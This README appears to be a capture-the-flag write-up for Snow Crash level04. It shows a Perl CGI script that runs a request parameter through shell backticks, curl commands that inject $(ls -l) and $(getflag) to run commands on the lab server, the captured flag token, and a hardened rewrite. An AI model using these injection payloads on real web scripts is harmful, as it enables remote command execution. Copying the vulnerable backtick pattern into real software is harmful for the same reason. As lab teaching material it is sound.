snow-crash/rparodi/level04/README.md
2026-01-29 12:53:21 +01:00

On arriving at level04, I notice the file level04.pl.

It is a Perl CGI script that looks like this:

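```perl
#!/usr/bin/perl
# localhost:4747
use CGI qw{param};
print "Content-type: text/html\n\n";
sub x {
  $y = $_[0];
  # Backticks run the string through a shell, so $y is parsed as shell syntax.
  print `echo $y 2>&1`;
}
# Pass the request parameter "x" to the handler.
x(param("x"));
```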

The script reads the request parameter `x` and prints it by interpolating it into an `echo` command run through backticks.

```
curl -d x="Common will just echo" http://127.0.0.1:4747
Common will just echo
```

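So we can display anything we want through `echo`. Because the value is interpolated into a shell command line, the shell also evaluates a command substitution (`$(...)`) placed in it. The backslash before `$` keeps the local shell from expanding it before curl sends the request.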

```
curl -d x="\$(ls -l)" http://127.0.0.1:4747
total 4 -r-xr-x---+ 1 flag04 level04 152 Jan 26 13:42 level04.pl
```

Commands are therefore executed on the server, so let us try `getflag`.

```
curl -d x="\$(getflag)" http://127.0.0.1:4747
Check flag.Here is your token : ne2searoevaevoem4ov4ar8ap
```
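
The root cause is the backtick expression in `level04.pl`, which hands the request parameter to a shell. A hardened rewrite follows as an added example (not the challenge's code); the names `echo_builtin` and `echo_external` and the `/usr/bin/printf` path are assumptions.

```perl
#!/usr/bin/perl
# Added example: hardened rewrite of level04.pl, not the challenge's own code.
use strict;
use warnings;
use CGI qw{param escapeHTML};

# Option 1: no external program at all. Reflect the value after
# HTML-escaping it, so it cannot inject markup into the response either.
sub echo_builtin {
    my ($y) = @_;
    return escapeHTML(defined $y ? $y : '') . "\n";
}

# Option 2: an external program is really needed. The list form of open()
# executes the program directly, so no shell ever parses $y: "$(...)",
# backticks, ";" and "|" stay literal bytes inside a single argument.
# Assumption: printf lives at /usr/bin/printf on this host.
sub echo_external {
    my ($y) = @_;
    $y = '' unless defined $y;
    open(my $fh, '-|', '/usr/bin/printf', '%s\n', $y)
        or die "cannot run printf: $!";
    local $/;                       # read the whole output at once
    my $out = <$fh>;
    close($fh) or die "printf exited with status $?";
    return escapeHTML($out);
}

print "Content-type: text/html\n\n";
my $x = param('x');                 # scalar context: first value only
print echo_builtin($x);
print echo_external($x);
```

With this version the request `x=$(ls -l)` comes back as the literal text `$(ls -l)` from both functions. CGI.pm also accepts parameters on the command line, so it can be checked offline with `perl hardened.pl 'x=$(ls -l)'`.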